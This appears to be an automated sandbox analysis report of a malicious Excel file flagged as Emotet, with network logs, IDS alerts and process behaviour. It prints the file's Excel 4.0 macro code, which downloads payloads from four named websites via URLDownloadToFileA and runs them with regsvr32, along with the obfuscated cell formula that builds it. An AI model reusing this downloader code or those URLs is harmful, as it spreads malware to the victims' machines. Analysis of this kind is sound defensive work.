                                    Number of OLE Files:1

                                    OLE File "Untitled-09112022.xls"

                                    Indicators
                                    Has Summary Info:
                                    Application Name:Microsoft Excel
                                    Encrypted Document:False
                                    Contains Word Document Stream:False
                                    Contains Workbook/Book Stream:True
                                    Contains PowerPoint Document Stream:False
                                    Contains Visio Document Stream:False
                                    Contains ObjectPool Stream:False
                                    Flash Objects Count:0
                                    Contains VBA Macros:False
                                    Summary
                                    Code Page:1251
                                    Author:
                                    Last Saved By:
                                    Create Time:2015-06-05 18:19:34
                                    Last Saved Time:2022-11-08 19:22:48
                                    Creating Application:
                                    Security:0
                                    Document Summary
                                    Document Code Page:1251
                                    Thumbnail Scaling Desired:False
                                    Company:
                                    Contains Dirty Links:False
                                    Shared Document:False
                                    Changed Hyperlinks:False
                                    Application Version:1048576

                                    Streams

                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                    General
                                    Stream Path:\x5DocumentSummaryInformation
                                    File Type:data
                                    Stream Size:4096
                                    Entropy:0.3985130586395627
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . $ . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . S h e e t 5 . . . . . S h e e t 6 . . . . . S h e
                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 24 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 e1 00 00 00
                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                    General
                                    Stream Path:\x5SummaryInformation
                                    File Type:data
                                    Stream Size:4096
                                    Entropy:0.27473604257009626
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G y d a r . . . . . . . . . . . G y d a r . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . @ . . . . t l | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 83024
                                    General
                                    Stream Path:Workbook
                                    File Type:Applesoft BASIC program data, first line number 16
                                    Stream Size:83024
                                    Entropy:5.932960419917662
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . \\ . p . . . . G y d a r B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . P . 8 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . .
                                    Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 47 79 64 61 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                    Macro 4.0 Code

                                    Name:Sheet7
                                    Extraction:dynamic
                                    Type:4
                                    Final:False
                                    Visible:True
                                    Protected:False
                                    6,4,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hsweixintp.com/wp-admin/4m1WxDxza6D8SVrfF/","..\elv1.ooocccxxx",0,0)",E10)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx")",E12)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.stickers-et-deco.com/admin002vqimbe/hRFZkkzLIl/","..\elv2.ooocccxxx",0,0)",E14)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx")",E16)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.cecambrils.cat/wp-content/cXEhHssszV/","..\elv3.ooocccxxx",0,0)",E18)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx")",E20)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.clinicaportalpsicologia.com.br/wp-includes/d6tkyFFBNwY/","..\elv4.ooocccxxx",0,0)",E22)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv4.ooocccxxx")",E24)=FORMULA("=RETURN()",E28)
                                    Name:Sheet7
                                    Extraction:dynamic
                                    Type:4
                                    Final:False
                                    Visible:True
                                    Protected:False
                                    6,4,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hsweixintp.com/wp-admin/4m1WxDxza6D8SVrfF/","..\elv1.ooocccxxx",0,0)",E10)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx")",E12)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.stickers-et-deco.com/admin002vqimbe/hRFZkkzLIl/","..\elv2.ooocccxxx",0,0)",E14)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx")",E16)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.cecambrils.cat/wp-content/cXEhHssszV/","..\elv3.ooocccxxx",0,0)",E18)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx")",E20)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.clinicaportalpsicologia.com.br/wp-includes/d6tkyFFBNwY/","..\elv4.ooocccxxx",0,0)",E22)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv4.ooocccxxx")",E24)=FORMULA("=RETURN()",E28)
9,4,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hsweixintp.com/wp-admin/4m1WxDxza6D8SVrfF/","..\elv1.ooocccxxx",0,0)
11,4,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx")
13,4,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.stickers-et-deco.com/admin002vqimbe/hRFZkkzLIl/","..\elv2.ooocccxxx",0,0)
15,4,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx")
17,4,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.cecambrils.cat/wp-content/cXEhHssszV/","..\elv3.ooocccxxx",0,0)
19,4,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx")
21,4,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.clinicaportalpsicologia.com.br/wp-includes/d6tkyFFBNwY/","..\elv4.ooocccxxx",0,0)
23,4,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv4.ooocccxxx")
27,4,=RETURN()
                                    Name:Sheet7, Macrosheet
                                    Extraction:static
                                    Type:unknown
                                    Final:unknown
                                    Visible:True
                                    Protected:unknown
                                    SHEET: Sheet7, Macrosheet
CELL:E7, =(((((((FORMULA(((((((((((((('Sheet3'!L24&'Sheet3'!L26)&'Sheet3'!L27)&'Sheet3'!L28)&'Sheet3'!L28)&'Sheet2'!G8)&'Sheet2'!M18)&'Sheet3'!E2)&'Sheet3'!F10)&'Sheet2'!C21)&'Sheet5'!H22)&'Sheet2'!G31)&'Sheet4'!Q4)&'Sheet6'!F9)&'Sheet4'!S19,E10)=FORMULA((((((((((((((((((('Sheet3'!L24&'Sheet3'!G8)&'Sheet3'!F4)&'Sheet3'!G8)&'Sheet3'!O3)&'Sheet3'!L30)&'Sheet3'!F24)&'Sheet3'!L26)&'Sheet4'!I23)&'Sheet4'!G7)&'Sheet3'!A4)&'Sheet4'!I17)&'Sheet3'!A4)&'Sheet4'!B11)&'Sheet3'!F10)&'Sheet6'!S24)&'Sheet4'!M12)&'Sheet6'!F9)&'Sheet3'!F24)&'Sheet3'!L31,E12))=FORMULA(((((((((((((('Sheet3'!L24&'Sheet3'!L26)&'Sheet3'!L27)&'Sheet3'!L28)&'Sheet3'!L28)&'Sheet2'!G8)&'Sheet2'!M18)&'Sheet3'!E2)&'Sheet3'!F10)&'Sheet2'!C21)&'Sheet5'!H22)&'Sheet2'!J33)&'Sheet4'!Q4)&'Sheet6'!J16)&'Sheet4'!S19,E14))=FORMULA((((((((((((((((((('Sheet3'!L24&'Sheet3'!G8)&'Sheet3'!F4)&'Sheet3'!G8)&'Sheet3'!O3)&'Sheet3'!L30)&'Sheet3'!F24)&'Sheet3'!L26)&'Sheet4'!I23)&'Sheet4'!G7)&'Sheet3'!A4)&'Sheet4'!I17)&'Sheet3'!A4)&'Sheet4'!B11)&'Sheet3'!F10)&'Sheet6'!S24)&'Sheet4'!M12)&'Sheet6'!J16)&'Sheet3'!F24)&'Sheet3'!L31,E16))=FORMULA(((((((((((((('Sheet3'!L24&'Sheet3'!L26)&'Sheet3'!L27)&'Sheet3'!L28)&'Sheet3'!L28)&'Sheet2'!G8)&'Sheet2'!M18)&'Sheet3'!E2)&'Sheet3'!F10)&'Sheet2'!C21)&'Sheet5'!H22)&'Sheet2'!L31)&'Sheet4'!Q4)&'Sheet6'!M5)&'Sheet4'!S19,E18))=FORMULA((((((((((((((((((('Sheet3'!L24&'Sheet3'!G8)&'Sheet3'!F4)&'Sheet3'!G8)&'Sheet3'!O3)&'Sheet3'!L30)&'Sheet3'!F24)&'Sheet3'!L26)&'Sheet4'!I23)&'Sheet4'!G7)&'Sheet3'!A4)&'Sheet4'!I17)&'Sheet3'!A4)&'Sheet4'!B11)&'Sheet3'!F10)&'Sheet6'!S24)&'Sheet4'!M12)&'Sheet6'!M5)&'Sheet3'!F24)&'Sheet3'!L31,E20))=FORMULA(((((((((((((('Sheet3'!L24&'Sheet3'!L26)&'Sheet3'!L27)&'Sheet3'!L28)&'Sheet3'!L28)&'Sheet2'!G8)&'Sheet2'!M18)&'Sheet3'!E2)&'Sheet3'!F10)&'Sheet2'!C21)&'Sheet5'!H22)&'Sheet2'!N33)&'Sheet4'!Q4)&'Sheet6'!O12)&'Sheet4'!S19,E22))=FORMULA((((((((((((((((((('Sheet3'!L24&'Sheet3'!G8)&'Sheet3'!F4)&'Sheet3'!G8)&'Sheet3'!O3)&'Sheet3'!L30)&'Sheet3'!F24)&'Sheet3'!L26)&'Sheet4'!I23)&'Sheet4'!G7)&'Sheet3'!A4)&'Sheet4'!I17)&'Sheet3'!A4)&'Sheet4'!B11)&'Sheet3'!F10)&'Sheet6'!S24)&'Sheet4'!M12)&'Sheet6'!O12)&'Sheet3'!F24)&'Sheet3'!L31,E24))=FORMULA((('Sheet3'!L24&'Sheet3'!G44)&'Sheet3'!H46)&'Sheet3'!J44,E28), 0

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    192.168.2.22218.38.121.17491794432404326 11/16/22-05:44:10.140861TCP2404326ET CNC Feodo Tracker Reported CnC Server TCP group 1449179443192.168.2.22218.38.121.17
                                    192.168.2.22115.178.55.2249175802404304 11/16/22-05:43:55.004674TCP2404304ET CNC Feodo Tracker Reported CnC Server TCP group 34917580192.168.2.22115.178.55.22

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Nov 16, 2022 05:43:13.311738968 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.516840935 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.517231941 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.517669916 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.712789059 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.730818033 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.730897903 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.730947971 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.730988979 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.731065989 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.731158972 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.731158972 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.731158972 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.731213093 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.731312990 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.731332064 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.731401920 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.731410980 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.731478930 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.731484890 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.731553078 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.731642962 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.731707096 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.735666037 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.922492981 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.922553062 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.922593117 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.922631979 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.922676086 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.922753096 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.922802925 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.922875881 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.922877073 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.922877073 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.922878027 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.922991037 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.923075914 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.923109055 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.923156977 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.923219919 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.923221111 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.923250914 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.923320055 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.923373938 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.923439026 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.923496008 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.923558950 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.923583031 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.923645973 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.923701048 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.923774004 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.923789978 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.923855066 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.923894882 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.923960924 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.924025059 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.924093008 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.924112082 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.924139977 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.924179077 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.924200058 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:13.924266100 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:13.924705029 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:14.114227057 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:14.114286900 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:14.114372969 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:14.114453077 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:14.114528894 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:14.114543915 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:14.114543915 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:14.114543915 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:14.114573956 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:14.114599943 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:14.114629984 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:14.114696980 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:14.114768982 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:14.114778042 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:14.114844084 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:14.114922047 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:14.114993095 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:14.115044117 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:14.115108013 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:14.115118980 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:14.115202904 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:14.115211010 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:14.115268946 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:14.115308046 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:14.115371943 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:14.115447044 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:14.115514994 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:14.115586042 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:14.115657091 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:14.115674019 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:14.115714073 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:14.115747929 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:14.115791082 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:14.115855932 CET4917180192.168.2.2245.207.116.88
                                    Nov 16, 2022 05:43:14.115928888 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:14.115978956 CET804917145.207.116.88192.168.2.22
                                    Nov 16, 2022 05:43:14.115994930 CET4917180192.168.2.2245.207.116.88

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Nov 16, 2022 05:43:11.957138062 CET5586853192.168.2.228.8.8.8
                                    Nov 16, 2022 05:43:12.959602118 CET5586853192.168.2.228.8.8.8
                                    Nov 16, 2022 05:43:13.303927898 CET53558688.8.8.8192.168.2.22
                                    Nov 16, 2022 05:43:13.643359900 CET53558688.8.8.8192.168.2.22
                                    Nov 16, 2022 05:43:17.954427958 CET4968853192.168.2.228.8.8.8
                                    Nov 16, 2022 05:43:17.972064972 CET53496888.8.8.8192.168.2.22
                                    Nov 16, 2022 05:43:19.771563053 CET5883653192.168.2.228.8.8.8
                                    Nov 16, 2022 05:43:19.821305990 CET53588368.8.8.8192.168.2.22
                                    Nov 16, 2022 05:43:20.525823116 CET5013453192.168.2.228.8.8.8
                                    Nov 16, 2022 05:43:20.949525118 CET53501348.8.8.8192.168.2.22

                                    ICMP Packets

                                    TimestampSource IPDest IPChecksumCodeType
                                    Nov 16, 2022 05:43:13.643457890 CET192.168.2.228.8.8.8d026(Port unreachable)Destination Unreachable

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Nov 16, 2022 05:43:11.957138062 CET192.168.2.228.8.8.80xdcaStandard query (0)hsweixintp.comA (IP address)IN (0x0001)false
                                    Nov 16, 2022 05:43:12.959602118 CET192.168.2.228.8.8.80xdcaStandard query (0)hsweixintp.comA (IP address)IN (0x0001)false
                                    Nov 16, 2022 05:43:17.954427958 CET192.168.2.228.8.8.80x7ac4Standard query (0)www.stickers-et-deco.comA (IP address)IN (0x0001)false
                                    Nov 16, 2022 05:43:19.771563053 CET192.168.2.228.8.8.80x9445Standard query (0)www.cecambrils.catA (IP address)IN (0x0001)false
                                    Nov 16, 2022 05:43:20.525823116 CET192.168.2.228.8.8.80xc28eStandard query (0)www.clinicaportalpsicologia.com.brA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Nov 16, 2022 05:43:13.303927898 CET8.8.8.8192.168.2.220xdcaNo error (0)hsweixintp.comwww.hsweixintp.comCNAME (Canonical name)IN (0x0001)false
                                    Nov 16, 2022 05:43:13.303927898 CET8.8.8.8192.168.2.220xdcaNo error (0)www.hsweixintp.com45.207.116.88A (IP address)IN (0x0001)false
                                    Nov 16, 2022 05:43:13.643359900 CET8.8.8.8192.168.2.220xdcaNo error (0)hsweixintp.comwww.hsweixintp.comCNAME (Canonical name)IN (0x0001)false
                                    Nov 16, 2022 05:43:13.643359900 CET8.8.8.8192.168.2.220xdcaNo error (0)www.hsweixintp.com45.207.116.88A (IP address)IN (0x0001)false
                                    Nov 16, 2022 05:43:17.972064972 CET8.8.8.8192.168.2.220x7ac4No error (0)www.stickers-et-deco.com163.172.108.69A (IP address)IN (0x0001)false
                                    Nov 16, 2022 05:43:19.821305990 CET8.8.8.8192.168.2.220x9445No error (0)www.cecambrils.catcecambrils.catCNAME (Canonical name)IN (0x0001)false
                                    Nov 16, 2022 05:43:19.821305990 CET8.8.8.8192.168.2.220x9445No error (0)cecambrils.cat185.23.117.132A (IP address)IN (0x0001)false
                                    Nov 16, 2022 05:43:20.949525118 CET8.8.8.8192.168.2.220xc28eNo error (0)www.clinicaportalpsicologia.com.brweb15f04.uni5.netCNAME (Canonical name)IN (0x0001)false
                                    Nov 16, 2022 05:43:20.949525118 CET8.8.8.8192.168.2.220xc28eNo error (0)web15f04.uni5.net187.1.136.16A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • 218.38.121.17
                                    • hsweixintp.com
                                    • www.stickers-et-deco.com
                                    • www.cecambrils.cat
                                    • www.clinicaportalpsicologia.com.br

                                    Statistics

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:05:43:09
                                    Start date:16/11/2022
                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                    Imagebase:0x13f250000
                                    File size:28253536 bytes
                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:4
                                    Start time:05:43:21
                                    Start date:16/11/2022
                                    Path:C:\Windows\System32\regsvr32.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx
                                    Imagebase:0xffa20000
                                    File size:19456 bytes
                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.920122880.0000000002011000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.920051864.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    General

                                    Target ID:6
                                    Start time:05:43:24
                                    Start date:16/11/2022
                                    Path:C:\Windows\System32\regsvr32.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll"
                                    Imagebase:0xffa20000
                                    File size:19456 bytes
                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.1193389765.0000000000211000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.1193348564.0000000000160000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 00000006.00000002.1193452350.00000000002FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    General

                                    Target ID:7
                                    Start time:05:43:25
                                    Start date:16/11/2022
                                    Path:C:\Windows\System32\regsvr32.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx
                                    Imagebase:0xffa20000
                                    File size:19456 bytes
                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:8
                                    Start time:05:43:26
                                    Start date:16/11/2022
                                    Path:C:\Windows\System32\regsvr32.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx
                                    Imagebase:0xffa20000
                                    File size:19456 bytes
                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:9
                                    Start time:05:43:27
                                    Start date:16/11/2022
                                    Path:C:\Windows\System32\regsvr32.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\elv4.ooocccxxx
                                    Imagebase:0xffa20000
                                    File size:19456 bytes
                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:11
                                    Start time:05:44:34
                                    Start date:16/11/2022
                                    Path:C:\Windows\System32\regsvr32.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll
                                    Imagebase:0xffa20000
                                    File size:19456 bytes
                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
